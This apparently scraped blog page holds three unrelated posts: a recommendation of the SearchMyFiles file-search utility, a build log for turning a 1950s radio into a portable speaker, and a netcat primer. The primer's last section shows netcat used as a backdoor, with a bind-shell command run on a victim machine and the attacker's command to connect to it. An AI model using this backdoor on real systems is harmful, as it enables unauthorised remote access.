Find Duplicate Files in your Computer with SearchMyFiles

I come across a useful tool called SearchMyFiles that is in fact the alternative to the default Windows’ Search for files and folders option. SearchMyFiles also allows you to easily search files in your system by wildcard, by last modified/created/last accessed time, by file attributes, by file content (text or binary search), and by the file size.
Not only this, SearchMyFiles allows you to make a very accurate search that cannot be done with Windows search. For Example: You can search all files created in the last 10 minutes with size between 500 and 700 bytes. After you made a search, you can select one or more files, and save the list into text/html/csv/xml file, or copy the list to the clipboard.
The tool is free and portable that is it requires no installation and can be run directly from the USB drive as well thereby not leaving any traces in the registry. The tool is supported on all versions of windows starting from Windows 2000 and up to Windows 7.

http://www.nirsoft.net/utils/searchmyfiles.zip

Turn a 1950s wireless into a portable ipod speaker

This instructable shows the steps I took to turn a circa 1950 radio into a portable speaker system, suitable for any MP3 player.

We picked up this radio from the local antique shop for just £3. The internals don't work anymore, though they sure do look cool.

The total cost of everything was around £60 - £70. Everything was bought new, and this speaker system only uses one speaker, so we're left with a spare.

6.5" speaker. This is the same diameter as the original, so it could use the existing clasps.

180w Amplifer. This is one of those dirt-cheap ebay ones. I'm sure it won't actually pump out 180 watts (per channel), but for this kind of basic system, it's fine.

12V SLA battery. a 1.3Ah battery from maplin. It's small and cheap. 1.3Ah may not be enough though, we'll see.

Cigarette lighter. A standard 12v cigarette light from a car. This provides somewhere to plug the battery in to a charger.

Fancy Missile-style switch. This switch will be the main power isolator for the battery.

Cables: Short length of speaker cable, mono 3.5mm couple and 2 3.5mm jack-jack cables.

These are the main things. Not included about is bolts, washers, screws, or the scrap bits of wood.
1950s wireless into Portable Stereo from sladekious on Vimeo.

Netcat



How many times did you come across a blog/post that calls netcat a “swiss army knife”? Netcat is probablly a swiss army knife, but on steroids. It is a must have tool in your personal toolkit. If you haven’t had your first joy ride with netcat, read on, this post is for you.

Netcat allows you to read and write data across TCP and UDP sockets. That’s it, nothing else. In the simplicity of this utility, lies its very strength. Let us look at some of the very cool stuff that netcat is capable of:

Netcat is your port scanner: Yes, it can be a worthy port scanner and you can port scan a host using the following syntax:

nc -v -w2 -z scanme.org 20-40


-v makes the output verbose (add another v to increase the verbosity)

-w specifies that netcat should wait the specified number of seconds, before it decides that the attempt was useless.

-z ensures that netcat does not send any data to the listening ports.

20-40 is the port range that netcat is going to sprawl through.

Netcat is a backdoor: OK, I don’t want to sound like guys selling you a vegitable crusher over a broadcasting shopping channel and bragging about the fact that how it can crush carrots and cabbages at the same time. But netcat is even more versatile then that. It is often used as a backdoor by crackers. Following syntax (on victim machine) will run an instance of netcat listening on port 1000:

nc -l -p 1000 -e /bin/sh

-l instructs the netcat binary to be in listen mode, waiting for inbound connections

-p specifies the port number i.e. 1000

-e specifies the program or a binary that it should run after successful connection i.e. a shell (/bin/sh)

The attacker can connect back to the victim machine, on the specified port, using another netcat instance on his machine:

nc -v victim_IP 1000

victim_IP is the IP of the machine where the netcat was previously executed with -l and -e options. Ofcourse, the attacker has to figure out a way first to upload the netcat binary onto the victim’s machine.
SITE LINK::
OFFICIAL SITE